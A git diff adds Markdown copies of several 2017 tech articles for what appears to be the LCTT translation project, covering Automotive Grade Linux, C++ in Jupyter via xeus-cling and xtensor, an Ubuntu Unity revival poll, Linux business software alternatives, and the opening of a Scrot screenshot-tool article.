a/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md b/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md new file mode 100644 index 0000000000..9eee39888a --- /dev/null +++ b/sources/tech/20171129 Inside AGL Familiar Open Source Components Ease Learning Curve.md @@ -0,0 +1,70 @@ +Inside AGL: Familiar Open Source Components Ease Learning Curve +============================================================ + +![Matt Porter](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/porter-elce-agl.png?itok=E-5xG98S "Matt Porter") +Konsulko’s Matt Porter (pictured) and Scott Murray ran through the major components of the AGL’s Unified Code Base at Embedded Linux Conference Europe.[The Linux Foundation][1] + +Among the sessions at the recent [Embedded Linux Conference Europe (ELCE)][5] — 57 of which are [available on YouTube][2] -- are several reports on the Linux Foundation’s [Automotive Grade Linux project][6]. These include [an overview from AGL Community Manager Walt Miner ][3]showing how AGL’s Unified Code Base (UCB) Linux distribution is expanding from in-vehicle infotainment (IVI) to ADAS. There was even a presentation on using AGL to build a remote-controlled robot (see links below). + +Here we look at the “State of AGL: Plumbing and Services,” from Konsulko Group’s CTO Matt Porter and senior staff software engineer Scott Murray. Porter and Murray ran through the components of the current [UCB 4.0 “Daring Dab”][7] and detailed major upstream components and API bindings, many of which will be appear in the Electric Eel release due in Jan. 2018. + +Despite the automotive focus of the AGL stack, most of the components are already familiar to Linux developers. “It looks a lot like a desktop distro,” Porter told the ELCE attendees in Prague. “All these familiar friends.” + +Some of those friends include the underlying Yocto Project “Poky” with OpenEmbedded foundation, which is topped with layers like oe-core, meta-openembedded, and metanetworking. Other components are based on familiar open source software like systemd (application control), Wayland and Weston (graphics), BlueZ (Bluetooth), oFono (telephony), PulseAudio and ALSA (audio), gpsd (location), ConnMan (Internet), and wpa-supplicant (WiFi), among others. + +UCB’s application framework is controlled through a WebSocket interface to the API bindings, thereby enabling apps to talk to each other. There’s also a new W3C widget for an alternative application packaging scheme, as well as support for SmartDeviceLink, a technology developed at Ford that automatically syncs up IVI systems with mobile phones.  + +AGL UCB’s Wayland/Weston graphics layer is augmented with an “IVI shell” that works with the layer manager. “One of the unique requirements of automotive is the ability to separate aspects of the application in the layers,” said Porter. “For example, in a navigation app, the graphics rendering for the map may be completely different than the engine used for the UI decorations. One engine layers to a surface in Wayland to expose the map while the decorations and controls are handled by another layer.” + +For audio, ALSA and PulseAudio are joined by GENIVI AudioManager, which works together with PulseAudio. “We use AudioManager for policy driven audio routing,” explained Porter. “It allows you to write a very complex XML-based policy using a rules engine with audio routing.” + +UCB leans primarily on the well-known [Smack Project][8] for security, and also incorporates Tizen’s [Cynara][9] safe policy-checker service. A Cynara-enabled D-Bus daemon is used to control Cynara security policies. + +Porter and Murray went on to explain AGL’s API binding mechanism, which according to Murray “abstracts the UI from its back-end logic so you can replace it with your own custom UI.” You can re-use application logic with different UI implementations, such as moving from the default Qt to HTML5 or a native toolkit. Application binding requests and responses use JSON via HTTP or WebSocket. Binding calls can be made from applications or from other bindings, thereby enabling “stacking” of bindings. + +Porter and Murray concluded with a detailed description of each binding. These include upstream bindings currently in various stages of development. The first is a Master binding that manages the application lifecycle, including tasks such as install, uninstall, start, and terminate. Other upstream bindings include the WiFi binding and the BlueZ-based Bluetooth binding, which in the future will be upgraded with Bluetooth [PBAP][10] (Phone Book Access Profile). PBAP can connect with contacts databases on your phone, and links to the Telephony binding to replicate caller ID. + +The oFono-based Telephony binding also makes calls to the Bluetooth binding for Bluetooth Hands-Free-Profile (HFP) support. In the future, Telephony binding will add support for sent dial tones, call waiting, call forwarding, and voice modem support. + +Support for AM/FM radio is not well developed in the Linux world, so for its Radio binding, AGL started by supporting [RTL-SDR][11] code for low-end radio dongles. Future plans call for supporting specific automotive tuner devices. + +The MediaPlayer binding is in very early development, and is currently limited to GStreamer based audio playback and control. Future plans call for adding playlist controls, as well as one of the most actively sought features among manufacturers: video playback support. + +Location bindings include the [gpsd][12] based GPS binding, as well as GeoClue and GeoFence. GeoClue, which is built around the [GeoClue][13] D-Bus geolocation service, “overlaps a little with GPS, which uses the same location data,” says Porter. GeoClue also gathers location data from WiFi AP databases, 3G/4G tower info, and the GeoIP database — sources that are useful “if you’re inside or don’t have a good fix,” he added. + +GeoFence depends on the GPS binding, as well. It lets you establish a bounding box, and then track ingress and egress events. GeoFence also tracks “dwell” status, which is determined by arriving at home and staying for 10 minutes. “It then triggers some behavior based on a timeout,” said Porter. Future plans call for a customizable dwell transition time. + +While most of these Upstream bindings are well established, there are also Work in Progress (WIP) bindings that are still in the early stages, including CAN, HomeScreen, and WindowManager bindings. Farther out, there are plans to add speech recognition and text-to-speech bindings, as well as a WWAN modem binding. + +In conclusion, Porter noted: “Like any open source project, we desperately need more developers.” The Automotive Grade Linux project may seem peripheral to some developers, but it offers a nice mix of familiarity — grounded in many widely used open source projects -- along with the excitement of expanding into a new and potentially game changing computing form factor: your automobile. AGL has also demonstrated success — you can now [check out AGL in action in the 2018 Toyota Camry][14], followed in the coming month by most Toyota and Lexus vehicles sold in North America. + +Watch the complete video below: + +[视频][15] + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/event/elce/2017/11/inside-agl-familiar-open-source-components-ease-learning-curve + +作者:[ ERIC BROWN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/ericstephenbrown +[1]:https://www.linux.com/licenses/category/linux-foundation +[2]:https://www.youtube.com/playlist?list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk +[3]:https://www.youtube.com/watch?v=kfwEmjSjAzM&index=14&list=PLbzoR-pLrL6pISWAq-1cXP4_UZAyRtesk +[4]:https://www.linux.com/files/images/porter-elce-aglpng +[5]:http://events.linuxfoundation.org/events/embedded-linux-conference-europe +[6]:https://www.automotivelinux.org/ +[7]:https://www.linux.com/blog/2017/8/automotive-grade-linux-moves-ucb-40-launches-virtualization-workgroup +[8]:http://schaufler-ca.com/ +[9]:https://wiki.tizen.org/Security:Cynara +[10]:https://wiki.maemo.org/Bluetooth_PBAP +[11]:https://www.rtl-sdr.com/about-rtl-sdr/ +[12]:http://www.catb.org/gpsd/ +[13]:https://www.freedesktop.org/wiki/Software/GeoClue/ +[14]:https://www.linux.com/blog/event/automotive-linux-summit/2017/6/linux-rolls-out-toyota-and-lexus-vehicles +[15]:https://youtu.be/RgI-g5h1t8I diff --git a/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md b/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md new file mode 100644 index 0000000000..395c901618 --- /dev/null +++ b/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md @@ -0,0 +1,301 @@ +Interactive Workflows for C++ with Jupyter +============================================================ + +Scientists, educators and engineers not only use programming languages to build software systems, but also in interactive workflows, using the tools available to  _explore _ a problem and  _reason _ about it. + +Running some code, looking at a visualization, loading data, and running more code. Quick iteration is especially important during the exploratory phase of a project. + +For this kind of workflow, users of the C++ programming language currently have no choice but to use a heterogeneous set of tools that don’t play well with each other, making the whole process cumbersome, and difficult to reproduce. + + _We currently lack a good story for interactive computing in C++_ . + +In our opinion, this hurts the productivity of C++ developers: + +* Most of the progress made in software projects comes from incrementalism. Obstacles to fast iteration hinder progress. + +* This also makes C++ more difficult to teach. The first hours of a C++ class are rarely rewarding as the students must learn how to set up a small project before writing any code. And then, a lot more time is required before their work can result in any visual outcome. + +### Project Jupyter and Interactive Computing + + + +![](https://cdn-images-1.medium.com/max/1200/1*wOHyKy6fl3ltcBMNpCvC6Q.png) + +The goal of Project Jupyter is to provide a consistent set of tools for scientific computing and data science workflows, from the exploratory phase of the analysis to the presentation and the sharing of the results. The Jupyter stack was designed to be agnostic of the programming language, and also to allow alternative implementations of any component of the layered architecture (back-ends for programming languages, custom renderers for file types associated with Jupyter). The stack consists of + +* a low-level specification for messaging protocols, standardized file formats, + +* a reference implementation of these standards, + +* applications built on the top of these libraries: the Notebook, JupyterLab, Binder, JupyterHub + +* and visualization libraries integrated into the Notebook and JupyterLab. + +Adoption of the Jupyter ecosystem has skyrocketed in the past years, with millions of users worldwide, over a million Jupyter notebooks shared on GitHub and large-scale deployments of Jupyter in universities, companies and high-performance computing centers. + +### Jupyter and C++ + +One of the main extension points of the Jupyter stack is the  _kernel_ , the part of the infrastructure responsible for executing the user’s code. Jupyter kernels exist for [numerous programming languages][14]. + +Most Jupyter kernels are implemented in the target programming language: the reference implementation [ipykernel][15] in Python, [IJulia][16] in Julia, leading to a duplication of effort for the implementation of the protocol. A common denominator to a lot of these interpreted languages is that the interpreter generally exposes a C API, allowing the embedding into a native application. In an effort to consolidate these commonalities and save work for future kernel builders, we developed  _xeus_ . + + + +![](https://cdn-images-1.medium.com/max/1200/1*TKrPv5AvFM3NJ6a7VMu8Tw.png) + +[Xeus ][17]is a C++ implementation of the Jupyter kernel protocol. It is not a kernel itself but a library that facilitates the authoring of kernels, and other applications making use of the Jupyter kernel protocol. + +A typical kernel implementation using xeus would in fact make use of the target interpreter _ as a library._ + +There are a number of benefits of using xeus over implementing your kernel in the target language: + +* Xeus provides a complete implementation of the protocol, enabling a lot of features from the start for kernel authors, who only need to deal with the language bindings. + +* Xeus-based kernels can very easily provide a back-end for Jupyter interactive widgets. + +* Finally, xeus can be used to implement kernels for domain-specific languages such as SQL flavors. Existing approaches use a Python wrapper. With xeus, the resulting kernel won't require Python at run-time, leading to large performance benefits. + + + +![](https://cdn-images-1.medium.com/max/1200/1*Cr_cfHdrgFXHlO15qdNK7w.png) + +Interpreted C++ is already a reality at CERN with the [Cling][18]C++ interpreter in the context of the [ROOT][19] data analysis environment. + +As a first example for a kernel based on xeus, we have implemented [xeus-cling][20], a pure C++ kernel. + + + +![](https://cdn-images-1.medium.com/max/1600/1*NnjISpzZtpy5TOurg0S89A.gif) +Redirection of outputs to the Jupyter front-end, with different styling in the front-end. + +Complex features of the C++ programming language such as, polymorphism, templates, lambdas, are supported by the cling interpreter, making the C++ Jupyter notebook a great prototyping and learning platform for the C++ users. See the image below for a demonstration: + + + +![](https://cdn-images-1.medium.com/max/1600/1*lGVLY4fL1ytMfT-eWtoXkw.gif) +Features of the C++ programming language supported by the cling interpreter + +Finally, xeus-cling supports live quick-help, fetching the content on [cppreference][21] in the case of the standard library. + + + +![](https://cdn-images-1.medium.com/max/1600/1*Igegq0xBebuJV8hy0TGpfg.png) +Live help for the C++standard library in the Jupyter notebook + +> We realized that we started using the C++ kernel ourselves very early in the development of the project. For quick experimentation, or reproducing bugs. No need to set up a project with a cpp file and complicated project settings for finding the dependencies… Just write some code and hit Shift+Enter. + +Visual output can also be displayed using the rich display mechanism of the Jupyter protocol. + + + +![](https://cdn-images-1.medium.com/max/1600/1*t_9qAXtdkSXr-0tO9VvOzQ.png) +Using Jupyter's rich display mechanism to display an image inline in the notebook + + +![](https://cdn-images-1.medium.com/max/1200/1*OVfmXFAbfjUtGFXYS9fKRA.png) + +Another important feature of the Jupyter ecosystem are the [Jupyter Interactive Widgets][22]. They allow the user to build graphical interfaces and interactive data visualization inline in the Jupyter notebook. Moreover it is not just a collection of widgets, but a framework that can be built upon, to create arbitrary visual components. Popular interactive widget libraries include + +* [bqplot][1] (2-D plotting with d3.js) + +* [pythreejs][2] (3-D scene visualization with three.js) + +* [ipyleaflet][3] (maps visualization with leaflet.js) + +* [ipyvolume][4] (3-D plotting and volume rendering with three.js) + +* [nglview][5] (molecular visualization) + +Just like the rest of the Jupyter ecosystem, Jupyter interactive widgets were designed as a language-agnostic framework. Other language back-ends can be created reusing the front-end component, which can be installed separately. + +[xwidgets][23], which is still at an early stage of development, is a native C++ implementation of the Jupyter widgets protocol. It already provides an implementation for most of the widget types available in the core Jupyter widgets package. + + + +![](https://cdn-images-1.medium.com/max/1600/1*ro5Ggdstnf0DoqhTUWGq3A.gif) +C++ back-end to the Jupyter interactive widgets + +Just like with ipywidgets, one can build upon xwidgets and implement C++ back-ends for the Jupyter widget libraries listed earlier, effectively enabling them for the C++ programming language and other xeus-based kernels: xplot, xvolume, xthreejs… + + + +![](https://cdn-images-1.medium.com/max/1200/1*yCRYoJFnbtxYkYMRc9AioA.png) + +[xplot][24] is an experimental C++ back-end for the [bqplot][25] 2-D plotting library. It enables an API following the constructs of the  [_Grammar of Graphics_][26]  in C++. + +In xplot, every item in a chart is a separate object that can be modified from the back-end,  _dynamically_ . + +Changing a property of a plot item, a scale, an axis or the figure canvas itself results in the communication of an update message to the front-end, which reflects the new state of the widget visually. + + + +![](https://cdn-images-1.medium.com/max/1600/1*Mx2g3JuTG1Cfvkkv0kqtLA.gif) +Changing the data of a scatter plot dynamically to update the chart + +> Warning: the xplot and xwidgets projects are still at an early stage of development and are changing drastically at each release. + +Interactive computing environments like Jupyter are not the only missing tool in the C++ world. Two key ingredients to the success of Python as the  _lingua franca_  of data science is the existence of libraries like [NumPy][27] and [Pandas][28] at the foundation of the ecosystem. + + + +![](https://cdn-images-1.medium.com/max/1200/1*HsU43Jzp1vJZpX2g8XPJsg.png) + +[xtensor][29] is a C++ library meant for numerical analysis with multi-dimensional array expressions. + +xtensor provides + +* an extensible expression system enabling lazy NumPy-style broadcasting. + +* an API following the  _idioms_  of the C++ standard library. + +* tools to manipulate array expressions and build upon xtensor. + +xtensor exposes an API similar to that of NumPy covering a growing portion of the functionalities. A cheat sheet can be [found in the documentation][30]: + + + +![](https://cdn-images-1.medium.com/max/1600/1*PBrf5vWYC8VTq_7VUOZCpA.gif) +Scrolling the NumPy to xtensor cheat sheet + +However, xtensor internals are very different from NumPy. Using modern C++ techniques (template expressions, closure semantics) xtensor is a lazily evaluated library, avoiding the creation of temporary variables and unnecessary memory allocations, even in the case complex expressions involving broadcasting and language bindings. + +Still, from a user perspective, the combination of xtensor with the C++ notebook provides an experience very similar to that of NumPy in a Python notebook. + + + +![](https://cdn-images-1.medium.com/max/1600/1*ULFpg-ePkdUbqqDLJ9VrDw.png) +Using the xtensor array expression library in a C++ notebook + +In addition to the core library, the xtensor ecosystem has a number of other components + +* [xtensor-blas][6]: the counterpart to the numpy.linalg module. + +* [xtensor-fftw][7]: bindings to the [fftw][8] library. + +* [xtensor-io][9]: APIs to read and write various file formats (images, audio, NumPy's NPZ format). + +* [xtensor-ros][10]: bindings for ROS, the robot operating system. + +* [xtensor-python][11]: bindings for the Python programming language, allowing the use of NumPy arrays in-place, using the NumPy C API and the pybind11 library. + +* [xtensor-julia][12]: bindings for the Julia programming language, allowing the use of Julia arrays in-place, using the C API of the Julia interpreter, and the CxxWrap library. + +* [xtensor-r][13]: bindings for the R programming language, allowing the use of R arrays in-place. + +Detailing further the features of the xtensor framework would be beyond the scope of this post. + +If you are interested in trying the various notebooks presented in this post, there is no need to install anything. You can just use  _binder_ : + +![](https://cdn-images-1.medium.com/max/1200/1*9cy5Mns_I0eScsmDBjvxDQ.png) + +[The Binder project][31], which is part of Project Jupyter, enables the deployment of containerized Jupyter notebooks, from a GitHub repository together with a manifest listing the dependencies (as conda packages). + +All the notebooks in the screenshots above can be run online, by just clicking on one of the following links: + +[xtensor][32]: the C++ N-D array expression library in a C++ notebook + +[xwidgets][33]: the C++ back-end for Jupyter interactive widgets + +[xplot][34]: the C++ back-end to the bqplot 2-D plotting library for Jupyter. + + + +![](https://cdn-images-1.medium.com/max/1200/1*JwqhpMxMJppEepj7U4fV-g.png) + +[JupyterHub][35] is the multi-user infrastructure underlying open wide deployments of Jupyter like Binder but also smaller deployments for authenticated users. + +The modular architecture of JupyterHub enables a great variety of scenarios on how users are authenticated, and what service is made available to them. JupyterHub deployment for several hundreds of users have been done in various universities and institutions, including the Paris-Sud University, where the C++ kernel was also installed for the students to use. + +> In September 2017, the 350 first-year students at Paris-Sud University who took the “[Info 111: Introduction to Computer +>  Science][36]” class wrote their first lines of C++ in a Jupyter notebook. + +The use of Jupyter notebooks in the context of teaching C++ proved especially useful for the first classes, where students can focus on the syntax of the language without distractions such as compiling and linking. + +### Acknowledgements + +The software presented in this post was built upon the work of a large number of people including the Jupyter team and the Cling developers. + +We are especially grateful to [Patrick Bos ][37](who authored xtensor-fftw), Nicolas Thiéry, Min Ragan Kelley, Thomas Kluyver, Yuvi Panda, Kyle Cranmer, Axel Naumann and Vassil Vassilev. + +We thank the [DIANA/HEP][38] organization for supporting travel to CERN and encouraging the collaboration between Project Jupyter and the ROOT team. + +We are also grateful to the team at Paris-Sud University who worked on the JupyterHub deployment and the class materials, notably [Viviane Pons][39]. + +The development of xeus, xtensor, xwidgets and related packages at [QuantStack][40] is sponsored by [Bloomberg][41]. + +### About the authors (alphabetical order) + + [_Sylvain Corlay_][42] _, _ Scientific Software Developer at [QuantStack][43] + + [_Loic Gouarin_][44] _, _ Research Engineer at [Laboratoire de Mathématiques at Orsay][45] + + [_Johan Mabille_][46] _, _ Scientific Software Developer at [QuantStack][47] + + [_Wolf Vollprecht_][48] , Scientific Software Developer at [QuantStack][49] + +Thanks to [Maarten Breddels][50], [Wolf Vollprecht][51], [Brian E. Granger][52], and [Patrick Bos][53]. + +-------------------------------------------------------------------------------- + +via: https://blog.jupyter.org/interactive-workflows-for-c-with-jupyter-fe9b54227d92 + +作者:[QuantStack ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.jupyter.org/@QuantStack?source=post_header_lockup +[1]:https://github.com/bloomberg/bqplot +[2]:https://github.com/jovyan/pythreejs +[3]:https://github.com/ellisonbg/ipyleaflet +[4]:https://github.com/maartenbreddels/ipyvolume +[5]:https://github.com/arose/nglview +[6]:https://github.com/QuantStack/xtensor-blas +[7]:https://github.com/egpbos/xtensor-fftw +[8]:http://www.fftw.org/ +[9]:https://github.com/QuantStack/xtensor-io +[10]:https://github.com/wolfv/xtensor_ros +[11]:https://github.com/QuantStack/xtensor-python +[12]:https://github.com/QuantStack/Xtensor.jl +[13]:https://github.com/QuantStack/xtensor-r +[14]:https://github.com/jupyter/jupyter/wiki/Jupyter-kernels +[15]:https://github.com/ipython/ipykernel +[16]:https://github.com/JuliaLang/IJulia.jl +[17]:https://github.com/QuantStack/xeus +[18]:https://root.cern.ch/cling +[19]:https://root.cern.ch/ +[20]:https://github.com/QuantStack/xeus-cling +[21]:http://en.cppreference.com/w/ +[22]:http://jupyter.org/widgets +[23]:https://github.com/QUantStack/xwidgets +[24]:https://github.com/QuantStack/xplot +[25]:https://github.com/bloomberg/bqplot +[26]:https://dl.acm.org/citation.cfm?id=1088896 +[27]:http://www.numpy.org/ +[28]:https://pandas.pydata.org/ +[29]:https://github.com/QuantStack/xtensor/ +[30]:http://xtensor.readthedocs.io/en/latest/numpy.html +[31]:https://mybinder.org/ +[32]:https://beta.mybinder.org/v2/gh/QuantStack/xtensor/0.14.0-binder2?filepath=notebooks/xtensor.ipynb +[33]:https://beta.mybinder.org/v2/gh/QuantStack/xwidgets/0.6.0-binder?filepath=notebooks/xwidgets.ipynb +[34]:https://beta.mybinder.org/v2/gh/QuantStack/xplot/0.3.0-binder?filepath=notebooks +[35]:https://github.com/jupyterhub/jupyterhub +[36]:http://nicolas.thiery.name/Enseignement/Info111/ +[37]:https://twitter.com/egpbos +[38]:http://diana-hep.org/ +[39]:https://twitter.com/pyviv +[40]:https://twitter.com/QuantStack +[41]:http://www.techatbloomberg.com/ +[42]:https://twitter.com/SylvainCorlay +[43]:https://github.com/QuantStack/ +[44]:https://twitter.com/lgouarin +[45]:https://www.math.u-psud.fr/ +[46]:https://twitter.com/johanmabille?lang=en +[47]:https://github.com/QuantStack/ +[48]:https://twitter.com/wuoulf +[49]:https://github.com/QuantStack/ +[50]:https://medium.com/@maartenbreddels?source=post_page +[51]:https://medium.com/@wolfv?source=post_page +[52]:https://medium.com/@ellisonbg?source=post_page +[53]:https://medium.com/@egpbos?source=post_page diff --git a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md new file mode 100644 index 0000000000..0e38373c3f --- /dev/null +++ b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md @@ -0,0 +1,41 @@ +Someone Tries to Bring Back Ubuntu's Unity from the Dead as an Official Spin +============================================================ + + + +> The Ubuntu Unity remix would be supported for nine months + +Canonical's sudden decision of killing its Unity user interface after seven years affected many Ubuntu users, and it looks like someone now tries to bring it back from the dead as an unofficial spin. + +Long-time [Ubuntu][1] member Dale Beaudoin [ran a poll][2] last week on the official Ubuntu forums to take the pulse of the community and see if they are interested in an Ubuntu Unity Remix that would be released alongside Ubuntu 18.04 LTS (Bionic Beaver) next year and be supported for nine months or five years. + +Thirty people voted in the poll, with 67 percent of them opting for an LTS (Long Term Support) release of the so-called Ubuntu Unity Remix, while 33 percent voted for the 9-month supported release. It also looks like this upcoming Ubuntu Unity Spin [looks to become an official flavor][3], yet this means commitment from those developing it. + +"A recent poll voted 2/3rds in favor of Ubuntu Unity to become an LTS distribution. We should try to work this cycle assuming that it will be LTS and an official flavor," said Dale Beaudoin. "We will try and release an updated ISO once every week or 10 days using the current 18.04 daily builds of default Ubuntu Bionic Beaver as a platform." + +### Is Ubuntu Unity making a comeback? + +The last Ubuntu version to ship with Unity by default was Ubuntu 17.04 (Zesty Zapus), which will reach end of life on January 2018\. Ubuntu 17.10 (Artful Artful), the current stable release of the popular operating system, is the first to use the GNOME desktop environment by default for the main Desktop edition as Canonical CEO [announced][4] earlier this year that Unity would no longer be developed. + +However, Canonical is still offering the Unity desktop environment from the official software repositories, so if someone wants to install it, it's one click away. But the bad news is that they'll be supported up until the release of Ubuntu 18.04 LTS (Bionic Beaver) in April 2018, so the developers of the Ubuntu Unity Remix would have to continue to keep in on life support on their a separate repository. + +On the other hand, we don't believe Canonical will change their mind and accept this Ubuntu Unity Spin to become an official flavor, which would mean they failed to continue development of Unity, and now a handful of people can do it. Most probably, if interest in this Ubuntu Unity Remix won't fade away soon, it will be an unofficial spin supported by the nostalgic community. + +Question is, would you be interested in an Ubuntu Unity spin, official or not? + +-------------------------------------------------------------------------------- + +via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml + +作者:[Marius Nestor ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://news.softpedia.com/editors/browse/marius-nestor +[1]:http://linux.softpedia.com/downloadTag/Ubuntu +[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 +[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 +[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml +[5]:http://news.softpedia.com/editors/browse/marius-nestor diff --git a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md new file mode 100644 index 0000000000..195b51423a --- /dev/null +++ b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md @@ -0,0 +1,116 @@ +Yoliver istranslating. +Excellent Business Software Alternatives For Linux +------- + +Many business owners choose to use Linux as the operating system for their operations for a variety of reasons. + +1. Firstly, they don't have to pay anything for the privilege, and that is a massive bonus during the early stages of a company where money is tight. + +2. Secondly, Linux is a light alternative compared to Windows and other popular operating systems available today. + +Of course, lots of entrepreneurs worry they won't have access to some of the essential software packages if they make that move. However, as you will discover throughout this post, there are plenty of similar tools that will cover all the bases. + + [![](https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s400/4444061098_6eeaa7dc1a_z.jpg)][3] + +### Alternatives to Microsoft Word + +All company bosses will require access to a word processing tool if they want to ensure the smooth running of their operation according to + +[the latest article from Fareed Siddiqui][4] + +. You'll need that software to write business plans, letters, and many other jobs within your firm. Thankfully, there are a variety of alternatives you might like to select if you opt for the Linux operating system. Some of the most popular ones include: + +* LibreOffice Writer + +* AbiWord + +* KWord + +* LaTeX + +So, you just need to read some online reviews and then download the best word processor based on your findings. Of course, if you're not satisfied with the solution, you should take a look at some of the other ones on that list. In many instances, any of the programs mentioned above should work well. + +### Alternatives to Microsoft Excel + + [![](https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s400/28929069495_e85d2626ba_z.jpg)][5] + +You need a spreadsheet tool if you want to ensure your business doesn't get into trouble when it comes to bookkeeping and inventory control. There are specialist software packages on the market for both of those tasks, but + +[open-source alternatives][6] + +to Microsoft Excel will give you the most amount of freedom when creating your spreadsheets and editing them. While there are other packages out there, some of the best ones for Linux users include: + +* [LibreOffice Calc][1] + +* KSpread + +* Gnumeric + +Those programs work in much the same way as Microsoft Excel, and so you can use them for issues like accounting and stock control. You might also use that software to monitor employee earnings or punctuality. The possibilities are endless and only limited by your imagination. + +### Alternatives to Adobe Photoshop + + [![](https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s400/32206185926_c69accfcef_z.jpg)][7] + +Company bosses require access to design programs when developing their marketing materials and creating graphics for their websites. You might also use software of that nature to come up with a new business logo at some point. Lots of entrepreneurs spend a fortune on + +[Training Connections Photoshop classes][8] + +and those available from other providers. They do that in the hope of educating their teams and getting the best results. However, people who use Linux can still benefit from that expertise if they select one of the following + +[alternatives][9] + +: + +* GIMP + +* Krita + +* Pixel + +* LightZone + +The last two suggestions on that list require a substantial investment. Still, they function in much the same way as Adobe Photoshop, and so you should manage to achieve the same quality of work. + +### Other software solutions that you'll want to consider + +Alongside those alternatives to some of the most widely-used software packages around today, business owners should take a look at the full range of products they could use with the Linux operating system. Here are some tools you might like to research and consider: + +* Inkscape - similar to Coreldraw + +* LibreOffice Base - similar to Microsoft Access + +* LibreOffice Impress - similar to Microsoft PowerPoint + +* File Roller - siThis is a contributed postmilar to WinZip + +* Linphone - similar to Skype + +There are + +[lots of other programs][10] + + you'll also want to research, and so the best solution is to use the internet to learn more. You will find lots of reviews from people who've used the software in the past, and many of them will compare the tool to its Windows or iOS alternative. So, you shouldn't have to work too hard to identify the best ones and sort the wheat from the chaff. + +Now you have all the right information; it's time to weigh all the pros and cons of Linux and work out if it's suitable for your operation. In most instances, that operating system does not place any limits on your business activities. It's just that you need to use different software compared to some of your competitors. People who use Linux tend to benefit from improved security, speed, and performance. Also, the solution gets regular updates, and so it's growing every single day. Unlike Windows and other solutions; you can customize Linux to meet your requirements. With that in mind, do not make the mistake of overlooking this fantastic system! + +-------------------------------------------------------------------------------- + +via: http://linuxblog.darkduck.com/2017/11/excellent-business-software.html + +作者:[DarkDuck][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxblog.darkduck.com/ +[1]:http://linuxblog.darkduck.com/2015/08/pivot-tables-in-libreoffice-calc.html +[3]:https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s1600/4444061098_6eeaa7dc1a_z.jpg +[4]:https://www.linkedin.com/pulse/benefits-using-microsoft-word-fareed/ +[5]:https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s1600/28929069495_e85d2626ba_z.jpg +[6]:http://linuxblog.darkduck.com/2014/03/why-open-software-and-what-are-benefits.html +[7]:https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s1600/32206185926_c69accfcef_z.jpg +[8]:https://www.trainingconnection.com/photoshop-training.php +[9]:http://linuxblog.darkduck.com/2011/10/photoshop-alternatives-for-linux.html +[10]:http://www.makeuseof.com/tag/best-linux-software/ diff --git a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md new file mode 100644 index 0000000000..2b4d2248b2 --- /dev/null +++ b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md @@ -0,0 +1,108 @@ +Scrot: Linux command-line screen grabs made simple +============================================================ + +### Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. + +![Scrot: Screen grabs made simple](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A "Scrot: Screen grabs made simple") +Image credits : Original photo by Rikki Endsley. [CC BY-SA 4.0][13] + +There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][14] and [Shutter][15]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? + +Turn to the command line and a little utility called [Scrot][16]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. + +### Getting started with Scrot + +More Linux resources + +* 